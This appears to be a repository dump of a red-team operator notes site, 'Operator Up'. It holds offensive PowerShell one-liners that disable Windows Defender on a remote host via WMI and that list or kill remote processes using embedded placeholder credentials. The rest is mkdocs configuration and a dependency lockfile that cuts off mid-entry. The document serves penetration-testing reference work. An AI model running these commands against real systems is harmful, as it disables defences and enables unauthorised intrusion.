/docs/windows/remote_alteration.md: -------------------------------------------------------------------------------- 1 | # Windows Remote Alteration 2 | 3 | ## Powershell Remote Alteration 4 | 5 | ### Disable Defender Remotely using WMI 6 | 7 | ```Powershell 8 | Invoke-WmiMethod -ComputerName 10.0.1.2 -Class Win32_Process -Name Create -ArgumentList "powershell.exe -C `Set-MpPreference -DisableRealtimeMonitoring $true`" 9 | ``` -------------------------------------------------------------------------------- /docs/windows/remote_sa_cmds.md: -------------------------------------------------------------------------------- 1 | # Windows Remote Situational Awareness Commands 2 | 3 | ## WMI Remote Situational Awareness 4 | 5 | ### Remote process listing of machine 6 | 7 | ```powershell 8 | gwmi Win32_Process -ComputerName 43.*.*.5 | % {$name = $_.ProcessName; $ProcessOwner = ($_.GetOwner().User);$ProcID=$_.ProcessId;"$name`t`t$ProcessOwner`t$ProcID"} 9 | ``` 10 | 11 | ## PowerPick Situational Awareness 12 | 13 | ### Remote process listing of machine via Powerpick WMI with $credential object 14 | 15 | ```powershell 16 | powerpick $credential = New-Object System.Management.Automation.PSCredential ("DA\some",("TestPassword" | ConvertTo-SecureString -AsPlainText -Force)); gwmi Win32_Process -ComputerName -Credential $credential | ?{ $_.ProcessId -match "PID" }.Terminate() 17 | ``` 18 | 19 | ### Remote last boot time listing with PowerPick and $credential object 20 | 21 | ```powershell 22 | powerpick $credential = New-Object System.Management.Automation.PSCredential ("DA\some",("TestPassword" | ConvertTo-SecureString -AsPlainText -Force)); 23 | gwmi Win32_OperatingSystem -ComputerName -Credential $credential | select __SERVER,@{label='LastRestart';expression={$_.ConvertToDateTime($_.LastBootUpTime}} 24 | ``` -------------------------------------------------------------------------------- /mkdocs.yml: -------------------------------------------------------------------------------- 1 | site_name: Operator Up 2 | site_author: Obscurity Labs LLC. 3 | site_description: Helpful operator notes and techniques in actionable form 4 | site_url: https://obscuritylabs.com/ 5 | 6 | # Copyright 7 | copyright: Copyright © 2020-2020 Obscurity Labs LLC. 8 | 9 | language: en 10 | theme: 11 | name: "material" 12 | palette: 13 | primary: black 14 | accent: red 15 | features: 16 | - instant 17 | - tabs 18 | font: 19 | text: Roboto 20 | code: Roboto Mono 21 | favicon: img/favicon.png 22 | logo: img/logo_transparent_crop.jpg 23 | 24 | extra_css: 25 | - stylesheets/extra.css 26 | 27 | extra: 28 | social: 29 | - icon: fontawesome/brands/github-alt 30 | link: https://github.com/squidfunk 31 | - icon: fontawesome/brands/twitter 32 | link: https://twitter.com/squidfunk 33 | - icon: fontawesome/brands/linkedin 34 | link: https://linkedin.com/in/squidfunk 35 | 36 | # Extensions 37 | markdown_extensions: 38 | - markdown.extensions.admonition 39 | - markdown.extensions.attr_list 40 | - markdown.extensions.codehilite: 41 | guess_lang: false 42 | - markdown.extensions.def_list 43 | - markdown.extensions.footnotes 44 | - markdown.extensions.meta 45 | - markdown.extensions.toc: 46 | permalink: true 47 | - pymdownx.arithmatex 48 | - pymdownx.betterem: 49 | smart_enable: all 50 | - pymdownx.caret 51 | - pymdownx.critic 52 | - pymdownx.details 53 | - pymdownx.emoji: 54 | emoji_index: !!python/name:materialx.emoji.twemoji 55 | emoji_generator: !!python/name:materialx.emoji.to_svg 56 | # - pymdownx.highlight: 57 | # linenums_style: pymdownx-inline 58 | - pymdownx.inlinehilite 59 | - pymdownx.keys 60 | - pymdownx.magiclink: 61 | repo_url_shorthand: true 62 | user: squidfunk 63 | repo: mkdocs-material 64 | - pymdownx.mark 65 | - pymdownx.smartsymbols 66 | - pymdownx.snippets: 67 | check_paths: true 68 | - pymdownx.superfences 69 | - pymdownx.tabbed 70 | - pymdownx.tasklist: 71 | custom_checkbox: true 72 | - pymdownx.tilde 73 | 74 | plugins: 75 | - search # necessary for search to work 76 | - minify: 77 | minify_html: true 78 | - git-revision-date-localized: 79 | type: date 80 | 81 | repo_name: obscuritylabs/operator-up 82 | repo_url: https://github.com/obscuritylabs/operator-up 83 | edit_uri: https://github.com/obscuritylabs/operator-up 84 | 85 | # Page tree 86 | nav: 87 | - Home: index.md 88 | - Building: building.md 89 | - Contributing: contributing.md 90 | - License: license.md 91 | - Windows: 92 | - Privilege Escalation: windows/priv_esc.md 93 | - Host Situational Awareness: windows/local_sa_cmds.md 94 | - Remote Situational Awareness: windows/remote_sa_cmds.md 95 | - Network Situational Awareness: windows/network_sa_cmds.md 96 | - Remote Alteration: windows/remote_alteration.md 97 | - Lateral Movement: windows/lat_movement.md 98 | - Persistence: windows/persistence.md 99 | - Collection Operations: windows/collection_operations.md 100 | - Scanning: 101 | - nmap: scanning/nmap.md 102 | - Web Application: 103 | - SQL Injections: web_app/sql_injections.md 104 | - OSINT: 105 | - Email: osint/email.md 106 | - SOC: 107 | - sysmon: soc/sysmon/sysmon.md 108 | 109 | google_analytics: 110 | - UA-64026800-6 111 | - auto 112 | -------------------------------------------------------------------------------- /poetry.lock: -------------------------------------------------------------------------------- 1 | [[package]] 2 | name = "babel" 3 | version = "2.9.1" 4 | description = "Internationalization utilities" 5 | category = "main" 6 | optional = false 7 | python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" 8 | 9 | [package.dependencies] 10 | pytz = ">=2015.7" 11 | 12 | [[package]] 13 | name = "bracex" 14 | version = "2.2.1" 15 | description = "Bash style brace expander." 16 | category = "main" 17 | optional = false 18 | python-versions = ">=3.6" 19 | 20 | [[package]] 21 | name = "click" 22 | version = "8.0.4" 23 | description = "Composable command line interface toolkit" 24 | category = "main" 25 | optional = false 26 | python-versions = ">=3.6" 27 | 28 | [package.dependencies] 29 | colorama = {version = "*", markers = "platform_system == \"Windows\""} 30 | importlib-metadata = {version = "*", markers = "python_version < \"3.8\""} 31 | 32 | [[package]] 33 | name = "colorama" 34 | version = "0.4.4" 35 | description = "Cross-platform colored terminal text." 36 | category = "main" 37 | optional = false 38 | python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" 39 | 40 | [[package]] 41 | name = "ghp-import" 42 | version = "2.0.2" 43 | description = "Copy your docs directly to the gh-pages branch." 44 | category = "main" 45 | optional = false 46 | python-versions = "*" 47 | 48 | [package.dependencies] 49 | python-dateutil = ">=2.8.1" 50 | 51 | [package.extras] 52 | dev = ["twine", "markdown", "flake8", "wheel"] 53 | 54 | [[package]] 55 | name = "gitdb" 56 | version = "4.0.9" 57 | description = "Git Object Database" 58 | category = "main" 59 | optional = false 60 | python-versions = ">=3.6" 61 | 62 | [package.dependencies] 63 | smmap = ">=3.0.1,<6" 64 | 65 | [[package]] 66 | name = "gitpython" 67 | version = "3.1.27" 68 | description = "GitPython is a python library used to interact with Git repositories" 69 | category = "main" 70 | optional = false 71 | python-versions = ">=3.7" 72 | 73 | [package.dependencies] 74 | gitdb = ">=4.0.1,<5" 75 | typing-extensions = {version = ">=3.7.4.3", markers = "python_version < \"3.8\""} 76 | 77 | [[package]] 78 | name = "htmlmin" 79 | version = "0.1.12" 80 | description = "An HTML Minifier" 81 | category = "main" 82 | optional = false 83 | python-versions = "*" 84 | 85 | [[package]] 86 | name = "importlib-metadata" 87 | version = "4.11.3" 88 | description = "Read metadata from Python packages" 89 | category = "main" 90 | optional = false 91 | python-versions = ">=3.7" 92 | 93 | [package.dependencies] 94 | typing-extensions = {version = ">=3.6.4", markers = "python_version < \"3.8\""} 95 | zipp = ">=0.5" 96 | 97 | [package.extras] 98 | docs = ["sphinx", "jaraco.packaging (>=9)", "rst.linker (>=1.9)"] 99 | perf = ["ipython"] 100 | testing = ["pytest (>=6)", "pytest-checkdocs (>=2.4)", "pytest-flake8", "pytest-cov", "pytest-enabler (>=1.0.1)", "packaging", "pyfakefs", "flufl.flake8", "pytest-perf (>=0.9.2)", "pytest-black (>=0.3.7)", "pytest-mypy (>=0.9.1)", "importlib-resources (>=1.3)"] 101 | 102 | [[package]] 103 | name = "jinja2" 104 | version = "3.0.3" 105 | description = "A very fast and expressive template engine." 106 | category = "main" 107 | optional = false 108 | python-versions = ">=3.6" 109 | 110 | [package.dependencies] 111 | MarkupSafe = ">=2.0" 112 | 113 | [package.extras] 114 | i18n = ["Babel (>=2.7)"] 115 | 116 | [[package]] 117 | name = "jsmin" 118 | version = "3.0.1" 119 | description = "JavaScript minifier." 120 | category = "main" 121 | optional = false 122 | python-versions = "*" 123 | 124 | [[package]] 125 | name = "markdown" 126 | version = "3.3.6" 127 | description = "Python implementation of Markdown." 128 | category = "main" 129 | optional = false 130 | python-versions = ">=3.6" 131 | 132 | [package.dependencies] 133 | importlib-metadata = {version = ">=4.4", markers = "python_version < \"3.10\""} 134 | 135 | [package.extras] 136 | testing = ["coverage", "pyyaml"] 137 | 138 | [[package]] 139 | name = "markupsafe" 140 | version = "2.1.0" 141 | description = "Safely add untrusted strings to HTML/XML markup." 142 | category = "main" 143 | optional = false 144 | python-versions = ">=3.7" 145 | 146 | [[package]] 147 | name = "mergedeep" 148 | version = "1.3.4" 149 | description = "A deep merge function for 🐍." 150 | category = "main" 151 | optional = false 152 | python-versions = ">=3.6" 153 | 154 | [[package]] 155 | name = "mkdocs" 156 | version = "1.2.3" 157 | description = "Project documentation with Markdown." 158 | category = "main" 159 | optional = false 160 | python-versions = ">=3.6" 161 | 162 | [package.dependencies] 163 | click = ">=3.3" 164 | ghp-import = ">=1.0" 165 | importlib-metadata = ">=3.10" 166 | Jinja2 = ">=2.10.1" 167 | Markdown = ">=3.2.1" 168 | mergedeep = ">=1.3.4" 169 | packaging = ">=20.5" 170 | PyYAML = ">=3.10" 171 | pyyaml-env-tag = ">=0.1" 172 | watchdog = ">=2.0" 173 | 174 | [package.extras] 175 | i18n = ["babel (>=2.9.0)"] 176 | 177 | [[package]] 178 | name = "mkdocs-awesome-pages-plugin" 179 | version = "2.7.0" 180 | description = "An MkDocs plugin that simplifies configuring page titles and their order" 181 | category = "main" 182 | optional = false 183 | python-versions = ">=3.6.2" 184 | 185 | [package.dependencies] 186 | mkdocs = ">=1" 187 | wcmatch = ">=7" 188 | 189 | [[package]] 190 | name = "mkdocs-git-revision-date-localized-plugin" 191 | version = "0.5.2" 192 | description = "Mkdocs plugin that enables displaying the localized date of the last git modification of a markdown file." 193 | category = "main" 194 | optional = false 195 | python-versions = ">=3.5" 196 | 197 | [package.dependencies] 198 | babel = ">=2.7.0" 199 | GitPython = "*" 200 | jinja2 = "*" 201 | mkdocs = ">=0.17" 202 | 203 | [[package]] 204 | name = "mkdocs-material" 205 | version = "5.5.14" 206 | description = "A Material Design theme for MkDocs" 207 | category = "main" 208 | optional = false 209 | python-versions = "*" 210 | 211 | [package.dependencies] 212 | markdown = ">=3.2" 213 | mkdocs = ">=1.1" 214 | mkdocs-material-extensions = ">=1.0" 215 | Pygments = ">=2.4" 216 | pymdown-extensions = ">=7.0" 217 | 218 | [[package]] 219 | name = "mkdocs-material-extensions" 220 | version = "1.0.3" 221 | description = "Extension pack for Python Markdown." 222 | category = "main" 223 | optional = false 224 | python-versions = ">=3.6" 225 | 226 | [[package]] 227 | name = "mkdocs-minify-plugin" 228 | version = "0.3.0" 229 | description = "An MkDocs plugin to minify HTML and/or JS files prior to being written to disk" 230 | category = "main" 231 | optional = false 232 | python-versions = ">=2.7" 233 | 234 | [package.dependencies] 235 | htmlmin = ">=0.1.4" 236 | jsmin = ">=2.2.2" 237 | mkdocs = ">=1.0.4" 238 | 239 | [[package]] 240 | name = "packaging" 241 | version = "21.3" 242 | description = "Core utilities for Python packages" 243 | category = "main" 244 | optional = false 245 | python-versions = ">=3.6" 246 | 247 | [package.dependencies] 248 | pyparsing = ">=2.0.2,<3.0.5 || >3.0.5" 249 | 250 | [[package]] 251 | name = "pygments" 252 | version = "2.11.2" 253 | description = "Pygments is a syntax highlighting package written in Python." 254 | category = "main" 255 | optional = false 256 | python-versions = ">=3.5" 257 | 258 | [[package]] 259 | name = "pymdown-extensions" 260 | version = "9.2" 261 | description = "Extension pack for Python Markdown." 262 | category = "main" 263 | optional = false 264 | python-versions = ">=3.7" 265 | 266 | [package.dependencies] 267 | Markdown = ">=3.2" 268 | 269 | [[package]] 270 | name = "pyparsing" 271 | version = "3.0.7" 272 | description = "Python parsing module" 273 | category = "main" 274 | optional = false 275 | python-versions = ">=3.6" 276 | 277 | [package.extras] 278 | diagrams = ["jinja2", "railroad-diagrams"] 279 | 280 | [[package]] 281 | name = "python-dateutil" 282 | version = "2.8.2" 283 | description = "Extensions to the standard Python datetime module" 284 | category = "main" 285 | optional = false 286 | python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7" 287 | 288 | [package.dependencies] 289 | six = ">=1.5" 290 | 291 | [[package]] 292 | name = "pytz" 293 | version = "2021.3" 294 | description = "World timezone definitions, modern and historical" 295 | category = "main" 296 | optional = false 297 | python-versions = "*" 298 | 299 | [[package]] 300 | name = "pyyaml" 301 | version = "6.0" 302 | description = "YAML parser and emitter for Python" 303 | category = "main" 304 | optional = false 305 | python-versions = ">=3.6" 306 | 307 | [[package]] 308 | name = "pyyaml-env-tag" 309 | version = "0.1" 310 | description = "A custom YAML tag for referencing environment variables in YAML files. " 311 | category = "main" 312 | optional = false 313 | python-versions = ">=3.6" 314 | 315 | [package.dependencies] 316 | pyyaml = "*" 317 | 318 | [[package]] 319 | name = "six" 320 | version = "1.16.0" 321 | description = "Python 2 and 3 compatibility utilities" 322 | category = "main" 323 | optional = false 324 | python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*" 325 | 326 | [[package]] 327 | name = "smmap" 328 | version = "5.0.0" 329 | description = "A pure Python implementation of a sliding window memory map manager" 330 | category = "main" 331 | optional = false 332 | python-versions = ">=3.6" 333 | 334 | [[package]] 335 | name = "typing-extensions" 336 | version = "4.1.1" 337 | description = "Backported and Experimental Type Hints for Python 3.6+" 338 | category = "main" 339 | optional = false 340 | python-versions = ">=3.6" 341 | 342 | [[package]] 343 | name = "watchdog" 344 | version = "2.1.6" 345 | description = "Filesystem events monitoring" 346 | category = "main" 347 | optional = false 348 | python-versions = ">=3.6" 349 | 350 | [package.extras] 351 | watchmedo = ["PyYAML (>=3.10)"] 352 | 353 | [[package]] 354 | name = "wcmatch" 355 | version = "8.3" 356 | description = "Wildcard/glob file name matcher." 357 | category = "main" 358 | optional = false 359 | python-versions = ">=3.6" 360 | 361 | [package.dependencies] 362 | bracex = ">=2.1.1" 363 | 364 | [[package]] 365 | name = "zipp" 366 | version = "3.7.0" 367 | description = "Backport of pathlib-compatible object wrapper for zip files" 368 | category = "main" 369 | optional = false 370 | python-versions = ">=3.7" 371 | 372 | [package.extras] 373 | docs = ["sphinx", "jaraco.packaging (>=8.2)", "rst.linker (>=1.9)"] 374 | testing = ["pytest (>=6)", "pytest-checkdocs (>=2.4)", "pytest-flake8", "pytest-cov", "pytest-enabler (>=1.0.1)", "jaraco.itertools", "func-timeout", "pytest-black (>=0.3.7)", "pytest-mypy"] 375 | 376 | [metadata] 377 | lock-version = "1.1" 378 | python-versions = "^3.7" 379 | content-hash = "b8f2d0fba8070df32ecdaba28f283cf7bcab2da2c69ba0e7cfda5be44b868632" 380 | 381 | [metadata.files] 382 | babel = [ 383 | {file = "Babel-2.9.1-py2.py3-none-any.whl", hash = "sha256:ab49e12b91d937cd11f0b67cb259a57ab4ad2b59ac7a3b41d6c06c0ac5b0def9"}, 384 | {file = "Babel-2.9.1.tar.gz", hash = "sha256:bc0c176f9f6a994582230df350aa6e05ba2ebe4b3ac317eab29d9be5d2768da0"}, 385 | ] 386 | bracex = [ 387 | {file = "bracex-2.2.1-py3-none-any.whl", hash = "sha256:096c4b788bf492f7af4e90ef8b5bcbfb99759ae3415ea1b83c9d29a5ed8f9a94"}, 388 | {file = "bracex-2.2.1.tar.gz", hash = "sha256:1c8d1296e00ad9a91030ccb4c291f9e4dc7c054f12c707ba3c5ff3e9a81bcd21"}, 389 | ] 390 | click = [ 391 | {file = "click-8.0.4-py3-none-any.whl", hash = "sha256:6a7a62563bbfabfda3a38f3023a1db4a35978c0abd76f6c9605ecd6554d6d9b1"}, 392 | {file = "click-8.0.4.tar.gz", hash = "sha256:8458d7b1287c5fb128c90e23381cf99dcde74beaf6c7ff6384ce84d6fe090adb"}, 393 | ] 394 | colorama = [ 395 | {file = "colorama-0.4.4-py2.py3-none-any.whl", hash = "sha256:9f47eda37229f68eee03b24b9748937c7dc3868f906e8ba69fbcbdd3bc5dc3e2"}, 396 | {file = "colorama-0.4.4.tar.gz", hash = "sha256:5941b2b48a20143d2267e95b1c2a7603ce057ee39fd88e7329b0c292aa16869b"}, 397 | ] 398 | ghp-import = [ 399 | {file = "ghp-import-2.0.2.tar.gz", hash = "sha256:947b3771f11be850c852c64b561c600fdddf794bab363060854c1ee7ad05e071"}, 400 | {file = "ghp_import-2.0.2-py3-none-any.whl", hash = "sha256:5f8962b30b20652cdffa9c5a9812f7de6bcb56ec475acac579807719bf242c46"}, 401 | ] 402 | gitdb = [ 403 | {file = "gitdb-4.0.9-py3-none-any.whl", hash = "sha256:8033ad4e853066ba6ca92050b9df2f89301b8fc8bf7e9324d412a63f8bf1a8fd"}, 404 | {file = "gitdb-4.0.9.tar.gz", hash = "sha256:bac2fd45c0a1c9cf619e63a90d62bdc63892ef92387424b855792a6cabe789aa"}, 405 | ] 406 | gitpython = [ 407 | {file = "GitPython-3.1.27-py3-none-any.whl", hash = "sha256:5b68b000463593e05ff2b261acff0ff0972df8ab1b70d3cdbd41b546c8b8fc3d"}, 408 | {file = "GitPython-3.1.27.tar.gz", hash = "sha256:1c885ce809e8ba2d88a29befeb385fcea06338d3640712b59ca623c220bb5704"}, 409 | ] 410 | htmlmin = [ 411 | {file = "htmlmin-0.1.12.tar.gz", hash = "sha256:50c1ef4630374a5d723900096a961cff426dff46b48f34d194a81bbe14eca178"}, 412 | ] 413 | importlib-metadata = [ 414 | {file = "importlib_metadata-4.11.3-py3-none-any.whl", hash = "sha256:1208431ca90a8cca1a6b8af391bb53c1a2db74e5d1cef6ddced95d4b2062edc6"}, 415 | {file = "importlib_metadata-4.11.3.tar.gz", hash = "sha256:ea4c597ebf37142f827b8f39299579e31685c31d3a438b59f469406afd0f2539"}, 416 | ] 417 | jinja2 = [ 418 | {file = "Jinja2-3.0.3-py3-none-any.whl", hash = "sha256:077ce6014f7b40d03b47d1f1ca4b0fc8328a692bd284016f806ed0eaca390ad8"}, 419 | {file = "Jinja2-3.0.3.tar.gz", hash = "sha256:611bb273cd68f3b993fabdc4064fc858c5b47a973cb5aa7999ec1ba405c87cd7"}, 420 | ] 421 | jsmin = [ 422 | {file = "jsmin-3.0.1.tar.gz", hash = "sha256:c0959a121ef94542e807a674142606f7e90214a2b3d1eb17300244bbb5cc2bfc"}, 423 | ] 424 | markdown = [ 425 | {file = "Markdown-3.3.6-py3-none-any.whl", hash = "sha256:9923332318f843411e9932237530df53162e29dc7a4e2b91e35764583c46c9a3"}, 426 | {file = "Markdown-3.3.6.tar.gz", hash = "sha256:76df8ae32294ec39dcf89340382882dfa12975f87f45c3ed1ecdb1e8cefc7006"}, 427 | ] 428 | markupsafe = [ 429 | {file = "MarkupSafe-2.1.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:3028252424c72b2602a323f70fbf50aa80a5d3aa616ea6add4ba21ae9cc9da4c"}, 430 | {file = "MarkupSafe-2.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:290b02bab3c9e216da57c1d11d2ba73a9f73a614bbdcc027d299a60cdfabb11a"}, 431 | {file = "MarkupSafe-2.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6e104c0c2b4cd765b4e83909cde7ec61a1e313f8a75775897db321450e928cce"}, 432 | {file = "MarkupSafe-2.1.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:24c3be29abb6b34052fd26fc7a8e0a49b1ee9d282e3665e8ad09a0a68faee5b3"}, 433 | {file = "MarkupSafe-2.1.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:204730fd5fe2fe3b1e9ccadb2bd18ba8712b111dcabce185af0b3b5285a7c989"}, 434 | {file = "MarkupSafe-2.1.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:d3b64c65328cb4cd252c94f83e66e3d7acf8891e60ebf588d7b493a55a1dbf26"}, 435 | {file = "MarkupSafe-2.1.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:96de1932237abe0a13ba68b63e94113678c379dca45afa040a17b6e1ad7ed076"}, 436 | {file = "MarkupSafe-2.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:75bb36f134883fdbe13d8e63b8675f5f12b80bb6627f7714c7d6c5becf22719f"}, 437 | {file = "MarkupSafe-2.1.0-cp310-cp310-win32.whl", hash = "sha256:4056f752015dfa9828dce3140dbadd543b555afb3252507348c493def166d454"}, 438 | {file = "MarkupSafe-2.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:d4e702eea4a2903441f2735799d217f4ac1b55f7d8ad96ab7d4e25417cb0827c"}, 439 | {file = "MarkupSafe-2.1.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:f0eddfcabd6936558ec020130f932d479930581171368fd728efcfb6ef0dd357"}, 440 | {file = "MarkupSafe-2.1.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5ddea4c352a488b5e1069069f2f501006b1a4362cb906bee9a193ef1245a7a61"}, 441 | {file = "MarkupSafe-2.1.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:09c86c9643cceb1d87ca08cdc30160d1b7ab49a8a21564868921959bd16441b8"}, 442 | {file = "MarkupSafe-2.1.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a0a0abef2ca47b33fb615b491ce31b055ef2430de52c5b3fb19a4042dbc5cadb"}, 443 | {file = "MarkupSafe-2.1.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:736895a020e31b428b3382a7887bfea96102c529530299f426bf2e636aacec9e"}, 444 | {file = "MarkupSafe-2.1.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:679cbb78914ab212c49c67ba2c7396dc599a8479de51b9a87b174700abd9ea49"}, 445 | {file = "MarkupSafe-2.1.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:84ad5e29bf8bab3ad70fd707d3c05524862bddc54dc040982b0dbcff36481de7"}, 446 | {file = "MarkupSafe-2.1.0-cp37-cp37m-win32.whl", hash = "sha256:8da5924cb1f9064589767b0f3fc39d03e3d0fb5aa29e0cb21d43106519bd624a"}, 447 | {file = "MarkupSafe-2.1.0-cp37-cp37m-win_amd64.whl", hash = "sha256:454ffc1cbb75227d15667c09f164a0099159da0c1f3d2636aa648f12675491ad"}, 448 | {file = "MarkupSafe-2.1.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:142119fb14a1ef6d758912b25c4e803c3ff66920635c44078666fe7cc3f8f759"}, 449 | {file = "MarkupSafe-2.1.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b2a5a856019d2833c56a3dcac1b80fe795c95f401818ea963594b345929dffa7"}, 450 | {file = "MarkupSafe-2.1.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1d1fb9b2eec3c9714dd936860850300b51dbaa37404209c8d4cb66547884b7ed"}, 451 | {file = "MarkupSafe-2.1.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:62c0285e91414f5c8f621a17b69fc0088394ccdaa961ef469e833dbff64bd5ea"}, 452 | {file = "MarkupSafe-2.1.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:fc3150f85e2dbcf99e65238c842d1cfe69d3e7649b19864c1cc043213d9cd730"}, 453 | {file = "MarkupSafe-2.1.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:f02cf7221d5cd915d7fa58ab64f7ee6dd0f6cddbb48683debf5d04ae9b1c2cc1"}, 454 | {file = "MarkupSafe-2.1.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:d5653619b3eb5cbd35bfba3c12d575db2a74d15e0e1c08bf1db788069d410ce8"}, 455 | {file = "MarkupSafe-2.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:7d2f5d97fcbd004c03df8d8fe2b973fe2b14e7bfeb2cfa012eaa8759ce9a762f"}, 456 | {file = "MarkupSafe-2.1.0-cp38-cp38-win32.whl", hash = "sha256:3cace1837bc84e63b3fd2dfce37f08f8c18aeb81ef5cf6bb9b51f625cb4e6cd8"}, 457 | {file = "MarkupSafe-2.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:fabbe18087c3d33c5824cb145ffca52eccd053061df1d79d4b66dafa5ad2a5ea"}, 458 | {file = "MarkupSafe-2.1.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:023af8c54fe63530545f70dd2a2a7eed18d07a9a77b94e8bf1e2ff7f252db9a3"}, 459 | {file = "MarkupSafe-2.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:d66624f04de4af8bbf1c7f21cc06649c1c69a7f84109179add573ce35e46d448"}, 460 | {file = "MarkupSafe-2.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c532d5ab79be0199fa2658e24a02fce8542df196e60665dd322409a03db6a52c"}, 461 | {file = "MarkupSafe-2.1.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e67ec74fada3841b8c5f4c4f197bea916025cb9aa3fe5abf7d52b655d042f956"}, 462 | {file = "MarkupSafe-2.1.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:30c653fde75a6e5eb814d2a0a89378f83d1d3f502ab710904ee585c38888816c"}, 463 | {file = "MarkupSafe-2.1.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:961eb86e5be7d0973789f30ebcf6caab60b844203f4396ece27310295a6082c7"}, 464 | {file = "MarkupSafe-2.1.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:598b65d74615c021423bd45c2bc5e9b59539c875a9bdb7e5f2a6b92dfcfc268d"}, 465 | {file = "MarkupSafe-2.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:599941da468f2cf22bf90a84f6e2a65524e87be2fce844f96f2dd9a6c9d1e635"}, 466 | {file = "MarkupSafe-2.1.0-cp39-cp39-win32.whl", hash = "sha256:e6f7f3f41faffaea6596da86ecc2389672fa949bd035251eab26dc6697451d05"}, 467 | {file = "MarkupSafe-2.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:b8811d48078d1cf2a6863dafb896e68406c5f513048451cd2ded0473133473c7"}, 468 | {file = "MarkupSafe-2.1.0.tar.gz", hash = "sha256:80beaf63ddfbc64a0452b841d8036ca0611e049650e20afcb882f5d3c266d65f"}, 469 | ] 470 | mergedeep = [ 471 | {file = "mergedeep-1.3.4-py3-none-any.whl", hash = "sha256:70775750742b25c0d8f36c55aed03d24c3384d17c951b3175d898bd778ef0307"}, 472 | {file = "mergedeep-1.3.4.tar.gz", hash = "sha256:0096d52e9dad9939c3d975a774666af186eda617e6ca84df4c94dec30004f2a8"}, 473 | ] 474 | mkdocs = [ 475 | {file = "mkdocs-1.2.3-py3-none-any.whl", hash = "sha256:a1fa8c2d0c1305d7fc2b9d9f607c71778572a8b110fb26642aa00296c9e6d072"}, 476 | {file = "mkdocs-1.2.3.tar.gz", hash = "sha256:89f5a094764381cda656af4298727c9f53dc3e602983087e1fe96ea1df24f4c1"}, 477 | ] 478 | mkdocs-awesome-pages-plugin = [ 479 | {file = "mkdocs-awesome-pages-plugin-2.7.0.tar.gz", hash = "sha256:f0fb3cc8ccfd9ca904b8c6db0a0cbec24d0ff3f76540bfe063dc173b30f8d4a8"}, 480 | {file = "mkdocs_awesome_pages_plugin-2.7.0-py3-none-any.whl", hash = "sha256:875ae2b1a1a782a40ceb6fb8a5f2e83ffb15e6bdca29c597a4decb6bdd76e066"}, 481 | ] 482 | mkdocs-git-revision-date-localized-plugin = [ 483 | {file = "mkdocs-git-revision-date-localized-plugin-0.5.2.tar.gz", hash = "sha256:9a5f4f0f9de298af7c11f749822b9396d83c7920369ccd868d9cf035a627021f"}, 484 | {file = "mkdocs_git_revision_date_localized_plugin-0.5.2-py3-none-any.whl", hash = "sha256:3a109a2edd47cf2f80f60a272c88077ede4a88d25a46d9bdf276014bdbc3a14a"}, 485 | ] 486 | mkdocs-material = [ 487 | {file = "mkdocs-material-5.5.14.tar.gz", hash = "sha256:9f3237df1a72f91e0330a5e3b3711cb7aaa0d5705f9585e6ce6fbacaa16e777f"}, 488 | {file = "mkdocs_material-5.5.14-py2.py3-none-any.whl", hash = "sha256:a0b3b3e67606e04d13e777d13f3195402ea09e0c3ce279abc3666cac2c5b3a6d"}, 489 | ] 490 | mkdocs-material-extensions = [ 491 | {file = "mkdocs-material-extensions-1.0.3.tar.gz", hash = "sha256:bfd24dfdef7b41c312ede42648f9eb83476ea168ec163b613f9abd12bbfddba2"}, 492 | {file = "mkdocs_material_extensions-1.0.3-py3-none-any.whl", hash = "sha256:a82b70e533ce060b2a5d9eb2bc2e1be201cf61f901f93704b4acf6e3d5983a44"}, 493 | ] 494 | mkdocs-minify-plugin = [ 495 | {file = "mkdocs-minify-plugin-0.3.0.tar.gz", hash = 